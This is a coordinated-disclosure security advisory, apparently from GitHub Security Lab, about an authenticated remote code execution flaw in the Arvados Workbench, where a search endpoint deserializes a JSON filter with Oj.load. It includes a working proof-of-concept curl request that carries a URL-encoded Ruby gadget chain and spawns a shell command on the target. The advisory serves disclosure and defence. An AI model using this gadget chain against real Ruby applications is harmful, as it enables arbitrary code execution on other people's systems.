Coordinated Disclosure Timeline
- 2022-08-03: Sent report to Arvados maintainers
- 2022-08-03: Arvados maintainers acknowledged receiving the report
- 2022-08-12: Advisory was published
A remote code execution (RCE) vulnerability in the Arvados Workbench allowed authenticated attackers to execute arbitrary code via specially crafted JSON payloads.
Issue: Authenticated remote code execution due to insecure deserialization (
The Arvados Workbench uses Oj for deserializing JSON payloads from remote sources. When
Oj.load is used without a restricting mode, arbitrary Ruby objects can be deserialized. Deserializing untrusted data using any method that allows the construction of arbitrary objects is easily exploitable and, in many cases, allows an attacker to execute arbitrary code. So-called “gadget chains” that allow code execution exist for all versions of Ruby.
The Arvados Workbench exposes a search endpoint which uses
Oj.load to deserialize a JSON based filter query parameter. Authenticated attackers able to send arbitrary requests to this endpoint will be able to achieve remote code execution (RCE). The same is likely true for the
combine_selected_files_into_collection action inside of
Proof of concept (for Ruby 2.x)
The search endpoint can be attacked with the following deserialization gadget chain which creates the file
/tmp/pwned.txt on the attacked Arvados system (the test was performed against a setup as described on the Arvados-in-a-box page):
curl -i -s -k -X $'GET' \ -H $'Host: 172.17.0.2'-H $'Accept: application/json' -H $'X-Csrf-Token: [..] \ -b $'_arvados_workbench_session=[..]' \ $'https://172.17.0.2/search/choose?partial=true&filters=%7B%22%5E%231%22%3A%5B%5B%7B%22%5Ec%22%3A%22Gem%3A%3ASpecFetcher%22%7D%2C%7B%22%5Ec%22%3A%22Gem%3A%3AInstaller%22%7D%2C%7B%22%5Eo%22%3A%22Gem%3A%3ARequirement%22%2C%22requirements%22%3A%7B%22%5Eo%22%3A%22Gem%3A%3APackage%3A%3ATarReader%22%2C%22io%22%3A%7B%22%5Eo%22%3A%22Net%3A%3ABufferedIO%22%2C%22io%22%3A%7B%22%5Eo%22%3A%22Gem%3A%3APackage%3A%3ATarReader%3A%3AEntry%22%2C%22read%22%3A0%2C%22header%22%3A%22any%22%7D%2C%22debug%5Foutput%22%3A%7B%22%5Eo%22%3A%22Net%3A%3AWriteAdapter%22%2C%22socket%22%3A%7B%22%5Eo%22%3A%22Gem%3A%3ARequestSet%22%2C%22sets%22%3A%7B%22%5Eo%22%3A%22Net%3A%3AWriteAdapter%22%2C%22socket%22%3A%7B%22%5Ec%22%3A%22Kernel%22%7D%2C%22method%5Fid%22%3A%22%3Aspawn%22%7D%2C%22git%5Fset%22%3A%22date%20%3E%3E%20%2Ftmp%2Fpwned%2Etxt%22%7D%2C%22method%5Fid%22%3A%22%3Aresolve%22%7D%7D%7D%7D%5D%2C%22any%22%5D%7D'
(Hint: replace the
X-Csrf-Token header and the
_arvados_workbench_session cookie with valid (authenticated) values)
- The above payload for Ruby 2.x is based on a gadget chain for
Marshal.loadoriginally discovered by William Bowling aka vakzz.
- A payload for
Oj.loadsuch as the one above can be found in this blog post from Bishop Fox.
- We are in possession of an undisclosed
Oj.loadpayload for Ruby 3.x, that is based on the newest
Marshal.loadgadget chain from William Bowling.
This issue may lead to Remote Code Execution (RCE)
This issue was discovered and reported by GHSL team member @p- (Peter Stöckli).
You can contact the GHSL team at
firstname.lastname@example.org, please include a reference to
GHSL-2022-063 in any communication regarding this issue.